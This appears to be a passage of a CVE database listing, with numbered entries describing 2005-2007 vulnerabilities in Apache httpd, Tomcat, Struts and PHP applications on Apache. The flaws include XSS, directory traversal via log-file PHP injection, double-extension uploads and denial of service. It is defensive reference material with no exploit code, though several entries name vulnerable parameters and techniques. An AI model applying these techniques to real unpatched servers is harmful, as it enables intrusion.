6412| [CVE-2007-3382] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 treats single quotes ("'") as delimiters in cookies, which might cause sensitive information such as session IDs to be leaked and allow remote attackers to conduct session hijacking attacks.
6413| [CVE-2007-3304] Apache httpd 1.3.37, 2.0.59, and 2.2.4 with the Prefork MPM module, allows local users to cause a denial of service by modifying the worker_score and process_score arrays to reference an arbitrary process ID, which is sent a SIGUSR1 signal from the master process, aka "SIGUSR1 killer."
6414| [CVE-2007-3303] Apache httpd 2.0.59 and 2.2.4, with the Prefork MPM module, allows local users to cause a denial of service via certain code sequences executed in a worker process that (1) stop request processing by killing all worker processes and preventing creation of replacements or (2) hang the system by forcing the master process to fork an arbitrarily large number of worker processes. NOTE: This might be an inherent design limitation of Apache with respect to worker processes in hosted environments.
6415| [CVE-2007-3101] Multiple cross-site scripting (XSS) vulnerabilities in certain JSF applications in Apache MyFaces Tomahawk before 1.1.6 allow remote attackers to inject arbitrary web script via the autoscroll parameter, which is injected into Javascript that is sent to the client.
6416| [CVE-2007-2450] Multiple cross-site scripting (XSS) vulnerabilities in the (1) Manager and (2) Host Manager web applications in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote authenticated users to inject arbitrary web script or HTML via a parameter name to manager/html/upload, and other unspecified vectors.
6417| [CVE-2007-2449] Multiple cross-site scripting (XSS) vulnerabilities in certain JSP files in the examples web application in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote attackers to inject arbitrary web script or HTML via the portion of the URI after the '
6418| [CVE-2007-2353] Apache Axis 1.0 allows remote attackers to obtain sensitive information by requesting a non-existent WSDL file, which reveals the installation path in the resulting exception message.
6419| [CVE-2007-2025] Unrestricted file upload vulnerability in the UpLoad feature (lib/plugin/UpLoad.php) in PhpWiki 1.3.11p1 allows remote attackers to upload arbitrary PHP files with a double extension, as demonstrated by .php.3, which is interpreted by Apache as being a valid PHP file.
6420| [CVE-2007-1863] cache_util.c in the mod_cache module in Apache HTTP Server (httpd), when caching is enabled and a threaded Multi-Processing Module (MPM) is used, allows remote attackers to cause a denial of service (child processing handler crash) via a request with the (1) s-maxage, (2) max-age, (3) min-fresh, or (4) max-stale Cache-Control headers without a value.
6421| [CVE-2007-1862] The recall_headers function in mod_mem_cache in Apache 2.2.4 does not properly copy all levels of header data, which can cause Apache to return HTTP headers containing previously used data, which could be used by remote attackers to obtain potentially sensitive information.
6422| [CVE-2007-1860] mod_jk in Apache Tomcat JK Web Server Connector 1.2.x before 1.2.23 decodes request URLs within the Apache HTTP Server before passing the URL to Tomcat, which allows remote attackers to access protected pages via a crafted prefix JkMount, possibly involving double-encoded .. (dot dot) sequences and directory traversal, a related issue to CVE-2007-0450.
6423| [CVE-2007-1858] The default SSL cipher configuration in Apache Tomcat 4.1.28 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.17 uses certain insecure ciphers, including the anonymous cipher, which allows remote attackers to obtain sensitive information or have other, unspecified impacts.
6424| [CVE-2007-1842] Directory traversal vulnerability in login.php in JSBoard before 2.0.12 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the table parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, a related issue to CVE-2006-2019.
6425| [CVE-2007-1801] Directory traversal vulnerability in inc/lang.php in sBLOG 0.7.3 Beta allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the conf_lang_default parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by inc/lang.php.
6426| [CVE-2007-1743] suexec in Apache HTTP Server (httpd) 2.2.3 does not verify combinations of user and group IDs on the command line, which might allow local users to leverage other vulnerabilities to create arbitrary UID/GID owned files if /proc is mounted. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root." In addition, because this is dependent on other vulnerabilities, perhaps this is resultant and should not be included in CVE.
6427| [CVE-2007-1742] suexec in Apache HTTP Server (httpd) 2.2.3 uses a partial comparison for verifying whether the current directory is within the document root, which might allow local users to perform unauthorized operations on incorrect directories, as demonstrated using "html_backup" and "htmleditor" under an "html" directory. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
6428| [CVE-2007-1741] Multiple race conditions in suexec in Apache HTTP Server (httpd) 2.2.3 between directory and file validation, and their usage, allow local users to gain privileges and execute arbitrary code by renaming directories or performing symlink attacks. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
6429| [CVE-2007-1720] Directory traversal vulnerability in addressbook.php in the Addressbook 1.2 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the module_name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file.
6430| [CVE-2007-1636] Directory traversal vulnerability in index.php in RoseOnlineCMS 3 B1 allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the op parameter, as demonstrated by injecting PHP code into Apache log files via the URL and User-Agent HTTP header.
6431| [CVE-2007-1633] Directory traversal vulnerability in bbcode_ref.php in the Giorgio Ciranni Splatt Forum 4.0 RC1 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by bbcode_ref.php.
6432| [CVE-2007-1577] Directory traversal vulnerability in index.php in GeBlog 0.1 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the GLOBALS[tplname] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
6433| [CVE-2007-1539] Directory traversal vulnerability in inc/map.func.php in pragmaMX Landkarten 2.1 module allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the module_name parameter, as demonstrated via a static PHP code injection attack in an Apache log file.
6434| [CVE-2007-1524] Directory traversal vulnerability in themes/default/ in ZomPlog 3.7.6 and earlier allows remote attackers to include arbitrary local files via a .. (dot dot) in the settings[skin] parameter, as demonstrated by injecting PHP code into an Apache HTTP Server log file, which can then be included via themes/default/.
6435| [CVE-2007-1491] Apache Tomcat in Avaya S87XX, S8500, and S8300 before CM 3.1.3, and Avaya SES allows connections from external interfaces via port 8009, which exposes it to attacks from outside parties.
6436| [CVE-2007-1358] Cross-site scripting (XSS) vulnerability in certain applications using Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.34 allows remote attackers to inject arbitrary web script or HTML via crafted "Accept-Language headers that do not conform to RFC 2616".
6437| [CVE-2007-1349] PerlRun.pm in Apache mod_perl before 1.30, and RegistryCooker.pm in mod_perl 2.x, does not properly escape PATH_INFO before use in a regular expression, which allows remote attackers to cause a denial of service (resource consumption) via a crafted URI.
6438| [CVE-2007-0975] Variable extraction vulnerability in Ian Bezanson Apache Stats before 0.0.3 beta allows attackers to overwrite critical variables, with unknown impact, when the extract function is used on the _REQUEST superglobal array.
6439| [CVE-2007-0930] Variable extract vulnerability in Apache Stats before 0.0.3beta allows attackers to modify arbitrary variables and conduct attacks via unknown vectors involving the use of PHP's extract function.
6440| [CVE-2007-0792] The mod_perl initialization script in Bugzilla 2.23.3 does not set the Bugzilla Apache configuration to allow .htaccess permissions to override file permissions, which allows remote attackers to obtain the database username and password via a direct request for the localconfig file.
6441| [CVE-2007-0774] Stack-based buffer overflow in the map_uri_to_worker function (native/common/jk_uri_worker_map.c) in mod_jk.so for Apache Tomcat JK Web Server Connector 1.2.19 and 1.2.20, as used in Tomcat 4.1.34 and 5.5.20, allows remote attackers to execute arbitrary code via a long URL that triggers the overflow in a URI worker map routine.
6442| [CVE-2007-0637] Directory traversal vulnerability in zd_numer.php in Galeria Zdjec 3.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the galeria parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by zd_numer.php.
6443| [CVE-2007-0451] Apache SpamAssassin before 3.1.8 allows remote attackers to cause a denial of service via long URLs in malformed HTML, which triggers "massive memory usage."
6444| [CVE-2007-0450] Directory traversal vulnerability in Apache HTTP Server and Tomcat 5.x before 5.5.22 and 6.x before 6.0.10, when using certain proxy modules (mod_proxy, mod_rewrite, mod_jk), allows remote attackers to read arbitrary files via a .. (dot dot) sequence with combinations of (1) "/" (slash), (2) "\" (backslash), and (3) URL-encoded backslash (%5C) characters in the URL, which are valid separators in Tomcat but not in Apache.
6445| [CVE-2007-0419] The BEA WebLogic Server proxy plug-in before June 2006 for the Apache HTTP Server does not properly handle protocol errors, which allows remote attackers to cause a denial of service (server outage).
6446| [CVE-2007-0173] Directory traversal vulnerability in index.php in L2J Statistik Script 0.09 and earlier, when register_globals is enabled and magic_quotes is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
6447| [CVE-2007-0098] Directory traversal vulnerability in language.php in VerliAdmin 0.3 and earlier, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
6448| [CVE-2007-0086] ** DISPUTED ** The Apache HTTP Server, when accessed through a TCP connection with a large window size, allows remote attackers to cause a denial of service (network bandwidth consumption) via a Range header that specifies multiple copies of the same fragment. NOTE: the severity of this issue has been disputed by third parties, who state that the large window size required by the attack is not normally supported or configured by the server, or that a DDoS-style attack would accomplish the same goal.
6449| [CVE-2006-7217] Apache Derby before 10.2.1.6 does not determine schema privilege requirements during the DropSchemaNode bind phase, which allows remote authenticated users to execute arbitrary drop schema statements in SQL authorization mode.
6450| [CVE-2006-7216] Apache Derby before 10.2.1.6 does not determine privilege requirements for lock table statements at compilation time, and consequently does not enforce privilege requirements at execution time, which allows remote authenticated users to lock arbitrary tables.
6451| [CVE-2006-7197] The AJP connector in Apache Tomcat 5.5.15 uses an incorrect length for chunks, which can cause a buffer over-read in the ajp_process_callback in mod_jk, which allows remote attackers to read portions of sensitive memory.
6452| [CVE-2006-7196] Cross-site scripting (XSS) vulnerability in the calendar application example in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.15 allows remote attackers to inject arbitrary web script or HTML via the time parameter to cal2.jsp and possibly unspecified other vectors. NOTE: this may be related to CVE-2006-0254.1.
6453| [CVE-2006-7195] Cross-site scripting (XSS) vulnerability in implicit-objects.jsp in Apache Tomcat 5.0.0 through 5.0.30 and 5.5.0 through 5.5.17 allows remote attackers to inject arbitrary web script or HTML via certain header values.
6454| [CVE-2006-7098] The Debian GNU/Linux 033_-F_NO_SETSID patch for the Apache HTTP Server 1.3.34-4 does not properly disassociate httpd from a controlling tty when httpd is started interactively, which allows local users to gain privileges to that tty via a CGI program that calls the TIOCSTI ioctl.
6455| [CVE-2006-6869] Directory traversal vulnerability in includes/search/search_mdforum.php in MAXdev MDForum 2.0.1 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang cookie to error.php, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
6456| [CVE-2006-6675] Cross-site scripting (XSS) vulnerability in Novell NetWare 6.5 Support Pack 5 and 6 and Novell Apache on NetWare 2.0.48 allows remote attackers to inject arbitrary web script or HTML via unspecifeid parameters in Welcome web-app.
6457| [CVE-2006-6613] Directory traversal vulnerability in language.php in phpAlbum 0.4.1 Beta 6 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files or obtain sensitive information via a .. (dot dot) in the pa_lang[include_file] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
6458| [CVE-2006-6589] Cross-site scripting (XSS) vulnerability in ecommerce/control/keywordsearch in the Apache Open For Business Project (OFBiz) and Opentaps 0.9.3 allows remote attackers to inject arbitrary web script or HTML via the SEARCH_STRING parameter, a different issue than CVE-2006-6587. NOTE: some of these details are obtained from third party information.
6459| [CVE-2006-6588] The forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) trusts the (1) dataResourceTypeId, (2) contentTypeId, and certain other hidden form fields, which allows remote attackers to create unauthorized types of content, modify content, or have other unknown impact.
6460| [CVE-2006-6587] Cross-site scripting (XSS) vulnerability in the forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) allows remote attackers to inject arbitrary web script or HTML by posting a message.
6461| [CVE-2006-6445] Directory traversal vulnerability in error.php in Envolution 1.1.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
6462| [CVE-2006-6071] TWiki 4.0.5 and earlier, when running under Apache 1.3 using ApacheLogin with sessions and "ErrorDocument 401" redirects to a valid wiki topic, does not properly handle failed login attempts, which allows remote attackers to read arbitrary content by cancelling out of a failed authentication with a valid username and invalid password.
6463| [CVE-2006-6047] Directory traversal vulnerability in manager/index.php in Etomite 0.6.1.2 allows remote authenticated administrators to include and execute arbitrary local files via a .. (dot dot) in the f parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
6464| [CVE-2006-5894] Directory traversal vulnerability in lang.php in Rama CMS 0.68 and earlier, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by lang.php.
6465| [CVE-2006-5752] Cross-site scripting (XSS) vulnerability in mod_status.c in the mod_status module in Apache HTTP Server (httpd), when ExtendedStatus is enabled and a public server-status page is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving charsets with browsers that perform "charset detection" when the content-type is not specified.
6466| [CVE-2006-5733] Directory traversal vulnerability in error.php in PostNuke 0.763 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
6467| [CVE-2006-5263] Directory traversal vulnerability in templates/header.php3 in phpMyAgenda 3.1 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the language parameter, as demonstrated by a parameter value naming an Apache HTTP Server log file that apparently contains PHP code.
6468| [CVE-2006-4994] Multiple unquoted Windows search path vulnerabilities in Apache Friends XAMPP 1.5.2 might allow local users to gain privileges via a malicious program file in %SYSTEMDRIVE%, which is run when XAMPP attempts to execute (1) FileZillaServer.exe, (2) mysqld-nt.exe, (3) Perl.exe, or (4) xamppcontrol.exe with an unquoted "Program Files" pathname.
6469| [CVE-2006-4636] Directory traversal vulnerability in SZEWO PhpCommander 3.0 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Directory parameter, as demonstrated by parameter values naming Apache HTTP Server log files that apparently contain PHP code.
6470| [CVE-2006-4625] PHP 4.x up to 4.4.4 and PHP 5 up to 5.1.6 allows local users to bypass certain Apache HTTP Server httpd.conf options, such as safe_mode and open_basedir, via the ini_restore function, which resets the values to their php.ini (Master Value) defaults.
6471| [CVE-2006-4558] DeluxeBB 1.06 and earlier, when run on the Apache HTTP Server with the mod_mime module, allows remote attackers to execute arbitrary PHP code by uploading files with double extensions via the fileupload parameter in a newthread action in newpost.php.
6472| [CVE-2006-4191] Directory traversal vulnerability in memcp.php in XMB (Extreme Message Board) 1.9.6 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the langfilenew parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by header.php.
6473| [CVE-2006-4154] Format string vulnerability in the mod_tcl module 1.0 for Apache 2.x allows context-dependent attackers to execute arbitrary code via format string specifiers that are not properly handled in a set_var function call in (1) tcl_cmds.c and (2) tcl_core.c.
6474| [CVE-2006-4110] Apache 2.2.2, when running on Windows, allows remote attackers to read source code of CGI programs via a request that contains uppercase (or alternate case) characters that bypass the case-sensitive ScriptAlias directive, but allow access to the file on case-insensitive file systems.
6475| [CVE-2006-4004] Directory traversal vulnerability in index.php in vbPortal 3.0.2 through 3.6.0 Beta 1, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the bbvbplang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
6476| [CVE-2006-3918] http_protocol.c in (1) IBM HTTP Server 6.0 before 6.0.2.13 and 6.1 before 6.1.0.1, and (2) Apache HTTP Server 1.3 before 1.3.35, 2.0 before 2.0.58, and 2.2 before 2.2.2, does not sanitize the Expect header from an HTTP request when it is reflected back in an error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated using a Flash SWF file.
6477| [CVE-2006-3835] Apache Tomcat 5 before 5.5.17 allows remote attackers to list directories via a semicolon (
6478| [CVE-2006-3747] Off-by-one error in the ldap scheme handling in the Rewrite module (mod_rewrite) in Apache 1.3 from 1.3.28, 2.0.46 and other versions before 2.0.59, and 2.2, when RewriteEngine is enabled, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via crafted URLs that are not properly handled using certain rewrite rules.
6479| [CVE-2006-3362] Unrestricted file upload vulnerability in connectors/php/connector.php in FCKeditor mcpuk file manager, as used in (1) Geeklog 1.4.0 through 1.4.0sr3, (2) toendaCMS 1.0.0 Shizouka Stable and earlier, (3) WeBid 0.5.4, and possibly other products, when installed on Apache with mod_mime, allows remote attackers to upload and execute arbitrary PHP code via a filename with a .php extension and a trailing extension that is allowed, such as .zip.
6480| [CVE-2006-3102] Race condition in articles/BitArticle.php in Bitweaver 1.3, when run on Apache with the mod_mime extension, allows remote attackers to execute arbitrary PHP code by uploading arbitrary files with double extensions, which are stored for a small period of time under the webroot in the temp/articles directory.
6481| [CVE-2006-3070] write_ok.php in Zeroboard 4.1 pl8, when installed on Apache with mod_mime, allows remote attackers to bypass restrictions for uploading files with executable extensions by uploading a .htaccess file that with an AddType directive that assigns an executable module to files with assumed-safe extensions, as demonstrated by assigning the txt extension to be handled by application/x-httpd-php.
6482| [CVE-2006-2831] Drupal 4.6.x before 4.6.8 and 4.7.x before 4.7.2, when running under certain Apache configurations such as when FileInfo overrides are disabled within .htaccess, allows remote attackers to execute arbitrary code by uploading a file with multiple extensions, a variant of CVE-2006-2743.
6483| [CVE-2006-2806] The SMTP server in Apache Java Mail Enterprise Server (aka Apache James) 2.2.0 allows remote attackers to cause a denial of service (CPU consumption) via a long argument to the MAIL command.
6484| [CVE-2006-2743] Drupal 4.6.x before 4.6.7 and 4.7.0, when running on Apache with mod_mime, does not properly handle files with multiple extensions, which allows remote attackers to upload, modify, or execute arbitrary files in the files directory.
6485| [CVE-2006-2514] Coppermine galleries before 1.4.6, when running on Apache with mod_mime installed, allows remote attackers to upload arbitrary files via a filename with multiple file extensions.
6486| [CVE-2006-2330] PHP-Fusion 6.00.306 and earlier, running under Apache HTTP Server 1.3.27 and PHP 4.3.3, allows remote authenticated users to upload files of arbitrary types using a filename that contains two or more extensions that ends in an assumed-valid extension such as .gif, which bypasses the validation, as demonstrated by uploading then executing an avatar file that ends in ".php.gif" and contains PHP code in EXIF metadata.
6487| [CVE-2006-1777] Directory traversal vulnerability in doc/index.php in Jeremy Ashcraft Simplog 0.9.2 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the s parameter, as demonstrated by injecting PHP sequences into an Apache error_log file, which is then included by doc/index.php.
6488| [CVE-2006-1564] Untrusted search path vulnerability in libapache2-svn 1.3.0-4 for Subversion in Debian GNU/Linux includes RPATH values under the /tmp/svn directory for the (1) mod_authz_svn.so and (2) mod_dav_svn.so modules, which might allow local users to gain privileges by installing malicious libraries in that directory.
6489| [CVE-2006-1548] Cross-site scripting (XSS) vulnerability in (1) LookupDispatchAction and possibly (2) DispatchAction and (3) ActionDispatcher in Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to inject arbitrary web script or HTML via the parameter name, which is not filtered in the resulting error message.
6490| [CVE-2006-1547] ActionForm in Apache Software Foundation (ASF) Struts before 1.2.9 with BeanUtils 1.7 allows remote attackers to cause a denial of service via a multipart/form-data encoded form with a parameter name that references the public getMultipartRequestHandler method, which provides further access to elements in the CommonsMultipartRequestHandler implementation and BeanUtils.
6491| [CVE-2006-1546] Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to bypass validation via a request with a 'org.apache.struts.taglib.html.Constants.CANCEL' parameter, which causes the action to be canceled but would not be detected from applications that do not use the isCancelled check.
6492| [CVE-2006-1393] Multiple cross-site scripting (XSS) vulnerabilities in the mod_pubcookie Apache application server module in University of Washington Pubcookie 1.x, 3.0.0, 3.1.0, 3.1.1, 3.2 before 3.2.1b, and 3.3 before 3.3.0a allow remote attackers to inject arbitrary web script or HTML via unspecified attack vectors.
6493| [CVE-2006-1346] Directory traversal vulnerability in inc/setLang.php in Greg Neustaetter gCards 1.45 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in a lang[*][file] parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by index.php.
6494| [CVE-2006-1292] Directory traversal vulnerability in Jim Hu and Chad Little PHP iCalendar 2.21 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the phpicalendar[cookie_language] and phpicalendar[cookie_style] cookies, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by day.php.
6495| [CVE-2006-1243] Directory traversal vulnerability in install05.php in Simple PHP Blog (SPB) 0.4.7.1 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the blog_language parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included using install05.php.
6496| [CVE-2006-1095] Directory traversal vulnerability in the FileSession object in Mod_python module 3.2.7 for Apache allows local users to execute arbitrary code via a crafted session cookie.
6497| [CVE-2006-1079] htpasswd, as used in Acme thttpd 2.25b and possibly other products such as Apache, might allow local users to gain privileges via shell metacharacters in a command line argument, which is used in a call to the system function. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
6498| [CVE-2006-1078] Multiple buffer overflows in htpasswd, as used in Acme thttpd 2.25b, and possibly other products such as Apache, might allow local users to gain privileges via (1) a long command line argument and (2) a long line in a file. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
6499| [CVE-2006-0743] Format string vulnerability in LocalSyslogAppender in Apache log4net 1.2.9 might allow remote attackers to cause a denial of service (memory corruption and termination) via unknown vectors.
6500| [CVE-2006-0254] Multiple cross-site scripting (XSS) vulnerabilities in Apache Geronimo 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) time parameter to cal2.jsp and (2) any invalid parameter, which causes an XSS when the log file is viewed by the Web-Access-Log viewer.
6501| [CVE-2006-0150] Multiple format string vulnerabilities in the auth_ldap_log_reason function in Apache auth_ldap 1.6.0 and earlier allows remote attackers to execute arbitrary code via various vectors, including the username.
6502| [CVE-2006-0144] The proxy server feature in go-pear.php in PHP PEAR 0.2.2, as used in Apache2Triad, allows remote attackers to execute arbitrary PHP code by redirecting go-pear.php to a malicious proxy server that provides a modified version of Tar.php with a malicious extractModify function.
6503| [CVE-2006-0042] Unspecified vulnerability in (1) apreq_parse_headers and (2) apreq_parse_urlencoded functions in Apache2::Request (Libapreq2) before 2.07 allows remote attackers cause a denial of service (CPU consumption) via unknown attack vectors that result in quadratic computational complexity.
6504| [CVE-2005-4857] eZ publish 3.5 before 3.5.7, 3.6 before 3.6.5, 3.7 before 3.7.3, and 3.8 before 20051128 allows remote authenticated users to cause a denial of service (Apache httpd segmentation fault) via a request to content/advancedsearch.php with an empty SearchContentClassID parameter, reportedly related to a "memory addressing error".
6505| [CVE-2005-4849] Apache Derby before 10.1.2.1 exposes the (1) user and (2) password attributes in cleartext via (a) the RDBNAM parameter of the ACCSEC command and (b) the output of the DatabaseMetaData.getURL function, which allows context-dependent attackers to obtain sensitive information.
6506| [CVE-2005-4836] The HTTP/1.1 connector in Apache Tomcat 4.1.15 through 4.1.40 does not reject NULL bytes in a URL when allowLinking is configured, which allows remote attackers to read JSP source files and obtain sensitive information.
6507| [CVE-2005-4814] Unrestricted file upload vulnerability in Segue CMS before 1.3.6, when the Apache HTTP Server handles .phtml files with the PHP interpreter, allows remote attackers to upload and execute arbitrary PHP code by placing .phtml files in the userfiles/ directory.
6508| [CVE-2005-4703] Apache Tomcat 4.0.3, when running on Windows, allows remote attackers to obtain sensitive information via a request for a file that contains an MS-DOS device name such as lpt9, which leaks the pathname in an error message, as demonstrated by lpt9.xtp using Nikto.
6509| [CVE-2005-3745] Cross-site scripting (XSS) vulnerability in Apache Struts 1.2.7, and possibly other versions allows remote attackers to inject arbitrary web script or HTML via the query string, which is not properly quoted or filtered when the request handler generates an error message.
6510| [CVE-2005-3630] Fedora Directory Server before 10 allows remote attackers to obtain sensitive information, such as the password from adm.conf via an IFRAME element, probably involving an Apache httpd.conf configuration that orders "allow" directives before "deny" directives.
6511| [CVE-2005-3510] Apache Tomcat 5.5.0 to 5.5.11 allows remote attackers to cause a denial of service (CPU consumption) via a large number of simultaneous requests to list a web directory that has a large number of files.
6512| [CVE-2005-3392] Unspecified vulnerability in PHP before 4.4.1, when using the virtual function on Apache 2, allows remote attackers to bypass safe_mode and open_basedir directives.
6513| [CVE-2005-3357] mod_ssl in Apache 2.0 up to 2.0.55, when configured with an SSL vhost with access control and a custom error 400 error page, allows remote attackers to cause a denial of service (application crash) via a non-SSL request to an SSL port, which triggers a NULL pointer dereference.
6514| [CVE-2005-3352] Cross-site scripting (XSS) vulnerability in the mod_imap module of Apache httpd before 1.3.35-dev and Apache httpd 2.0.x before 2.0.56-dev allows remote attackers to inject arbitrary web script or HTML via the Referer when using image maps.
6515| [CVE-2005-3319] The apache2handler SAPI (sapi_apache2.c) in the Apache module (mod_php) for PHP 5.x before 5.1.0 final and 4.4 before 4.4.1 final allows attackers to cause a denial of service (segmentation fault) via the session.save_path option in a .htaccess file or VirtualHost.
6516| [CVE-2005-3164] The AJP connector in Apache Tomcat 4.0.1 through 4.0.6 and 4.1.0 through 4.1.36, as used in Hitachi Cosminexus Application Server and standalone, does not properly handle when a connection is broken before request body data is sent in a POST request, which can lead to an information leak when "unsuitable request body data" is used for a different request, possibly related to Java Servlet pages.
6517| [CVE-2005-2970] Memory leak in the worker MPM (worker.c) for Apache 2, in certain circumstances, allows remote attackers to cause a denial of service (memory consumption) via aborted connections, which prevents the memory for the transaction pool from being reused for other connections.
6518| [CVE-2005-2963] The mod_auth_shadow module 1.0 through 1.5 and 2.0 for Apache with AuthShadow enabled uses shadow authentication for all locations that use the require group directive, even when other authentication mechanisms are specified, which might allow remote authenticated users to bypass security restrictions.
6519| [CVE-2005-2728] The byte-range filter in Apache 2.0 before 2.0.54 allows remote attackers to cause a denial of service (memory consumption) via an HTTP header with a large Range field.
6520| [CVE-2005-2660] apachetop 0.12.5 and earlier, when running in debug mode, allows local users to create or append to arbitrary files via a symlink attack on atop.debug.
6521| [CVE-2005-2088] The Apache HTTP server before 1.3.34, and 2.0.x before 2.0.55, when acting as an HTTP proxy, allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes Apache to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling."
6522| [CVE-2005-1754] ** DISPUTED ** JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to read arbitrary files via a full pathname in the argument to the Download parameter. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
6523| [CVE-2005-1753] ** DISPUTED ** ReadMessage.jsp in JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to view other users' e-mail attachments via a direct request to /mailboxesdir/username@domainname. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
6524| [CVE-2005-1344] Buffer overflow in htdigest in Apache 2.0.52 may allow attackers to execute arbitrary code via a long realm argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
6525| [CVE-2005-1268] Off-by-one error in the mod_ssl Certificate Revocation List (CRL) verification callback in Apache, when configured to use a CRL, allows remote attackers to cause a denial of service (child process crash) via a CRL that causes a buffer overflow of one null byte.
6526| [CVE-2005-1266] Apache SpamAssassin 3.0.1, 3.0.2, and 3.0.3 allows remote attackers to cause a denial of service (CPU consumption and slowdown) via a message with a long Content-Type header without any boundaries.
6527| [CVE-2005-0808] Apache Tomcat before 5.x allows remote attackers to cause a denial of service (application crash) via a crafted AJP12 packet to TCP port 8007.
6528| [CVE-2005-0182] The mod_dosevasive module 1.9 and earlier for Apache creates temporary files with predictable filenames, which could allow remote attackers to overwrite arbitrary files via a symlink attack.
